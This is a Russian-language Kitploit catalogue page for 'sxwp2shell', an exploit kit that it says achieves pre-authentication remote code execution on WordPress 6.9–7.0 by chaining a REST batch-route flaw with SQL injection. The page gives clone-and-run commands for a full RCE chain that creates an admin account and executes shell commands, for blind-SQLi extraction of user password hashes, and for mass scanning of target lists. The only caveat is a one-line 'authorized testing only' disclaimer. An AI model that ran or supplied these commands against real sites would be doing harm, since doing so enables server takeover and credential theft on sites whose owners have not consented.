Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
sxwp2shell — WordPress wp2shell pre-auth RCE эксплойт-кит (CVE-2026-63030 + CVE-2026-60137) | Kitploit
Инструменты/GitHubGitHub/sentinelxofficial/sxwp2shell
Фреймворки для пентестаСканеры уязвимостейАнализ КодаЭксплуатацияВеб-безопасность
GitHubsentinelxofficial/sxwp2shell

sxwp2shell

WordPress wp2shell pre-auth RCE эксплойт-кит (CVE-2026-63030 + CVE-2026-60137)

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

/ / ____ / /()___ ___ / / | |/ / __ / _ / __ / / / __ / _ / / | / / / __/ / / / // / / / / / // | /_/_// //_/// //_/__//|_|

sxwp2shell — эксплойт RCE без аутентификации для WordPress через путаницу batch-маршрутов REST API (CVE-2026-63030) + SQL-инъекция (CVE-2026-60137).

Affected: WP 6.9.0–6.9.4 / 7.0.0–7.0.1


Установка

root@kitploit:~
git clone https://github.com/SentinelXofficial/sxwp2shell
cd sxwp2shell
chmod +x sxwp2shell.py

Python 3.7+, только стандартная библиотека — pip install не требуется.

Использование

КомандаЧто делает
check <url>Определяет версию, batch-эндпоинт, путаницу маршрутов и SQLi
exploit <url>Полная цепочка RCE (SQLi → создание администратора → shell)
read <url>Извлечение данных через Blind SQLi
scan <file>Массовое сканирование целей из файла, экспорт в CSV
root@kitploit:~
python3 sxwp2shell.py check https://target.com
python3 sxwp2shell.py exploit https://target.com --cmd id
python3 sxwp2shell.py read https://target.com --query "SELECT user_pass FROM wp_users"
python3 sxwp2shell.py scan targets.txt -o results.csv

Параметры

root@kitploit:~
--cmd CMD         Command to execute          (default: id)
--query QUERY     Custom SQL query
-k, --insecure    Skip SSL verification
--proxy PROXY     HTTP proxy
--timeout SEC     Request timeout              (default: 15)
--delay SEC       Delay between requests
--agent AGENT     Custom User-Agent
--no-color        Disable colored output
-o, --output      Save scan results to CSV

Отказ от ответственности

Только для авторизованного тестирования безопасности. Прочтите DISCLAIMER.md.

Скачать инструмент